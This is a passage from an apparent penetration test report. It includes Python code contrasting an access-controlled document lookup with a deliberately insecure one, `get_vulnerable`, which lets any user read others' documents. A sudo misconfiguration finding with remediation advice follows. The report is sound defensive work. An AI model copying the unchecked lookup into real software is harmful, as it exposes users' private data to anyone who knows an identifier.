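        # IDs cannot be enumerated. Defence in depth: the check below is the fix.
        doc_id = secrets.token_urlsafe(16)
        self._docs[doc_id] = Document(doc_id, owner, body)
        return doc_id

    def _authorised(self, actor, doc_id, owner_only=False):
        doc = self._docs.get(doc_id)
        # Unknown and forbidden objects raise the same error, so a caller
        # cannot use the response to probe which identifiers exist.
        if doc is None:
            raise PermissionError("forbidden")
        if doc.owner == actor or (not owner_only and actor in doc.shared_with):
            return doc
        raise PermissionError("forbidden")

    def share(self, actor, doc_id, grantee):
        """Only the owner may grant access; the grant is recorded server-side."""
        self._authorised(actor, doc_id, owner_only=True).shared_with.add(grantee)

    def get_vulnerable(self, actor, doc_id):
        """BAD: the identifier alone selects the object; `actor` is never consulted."""
        return self._docs[doc_id].body

    def get(self, actor, doc_id):
        """GOOD: object-level authorisation runs on every access."""
        return self._authorised(actor, doc_id).body


def can_read(store, actor, doc_id):
    """Convenience wrapper returning True/False instead of raising."""
    try:
        store.get(actor, doc_id)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    store = DocumentStore()
    doc = store.create("alice", "payroll Q3")
    print("bob via vulnerable lookup:", store.get_vulnerable("bob", doc))
    print("bob via checked lookup:   ", can_read(store, "bob", doc))
    store.share("alice", doc, "bob")
    print("bob after explicit share: ", can_read(store, "bob", doc))
```

The check lives in one private method that every reading and writing path goes through, which is what makes the audit the remediation calls for tractable: a reviewer only has to confirm that no public method reaches `_docs` directly, as `get_vulnerable` does.

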

F-005 — Sudo Misconfiguration — Root Privilege Escalation
Score: 7.8 (High)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration grants the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality: High
Integrity: High
Availability: High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.